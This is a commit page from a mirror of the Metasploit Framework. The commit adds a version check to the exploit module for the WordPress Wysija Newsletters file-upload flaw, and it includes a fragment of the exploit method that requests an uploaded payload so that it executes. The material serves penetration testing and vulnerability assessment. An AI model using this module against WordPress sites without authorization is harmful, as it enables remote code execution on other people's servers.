infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added check method

bug/bundler_fix
Christian Mehlmauer 2014-07-02 11:07:58 +02:00
parent 54a28a103c
commit 40175d3526
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 27 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
View File

@ -58,7 +58,33 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
res = send_request_cgi({
'uri' => readme_url,
'method' => 'GET'
})
# no readme present, so we can assume it's safe
if res.nil? || res.code != 200
return Msf::Exploit::CheckCode::Safe
end
# try to extract version from readme
# Example line:
# Stable tag: 2.6.6
version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number
if version.nil?
return Msf::Exploit::CheckCode::Unknown
end
print_status("#{peer} - Found version #{version} of the plugin")
if Gem::Version.new(version) < Gem::Version.new('2.6.7')
return Msf::Exploit::CheckCode::Appears
else
return Msf::Exploit::CheckCode::Safe
end
end
def exploit
@ -92,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{peer} - Executing payload #{payload_uri}")
res = send_request_raw({
res = send_request_cgi({
'uri' => payload_uri,
'method' => 'GET'
})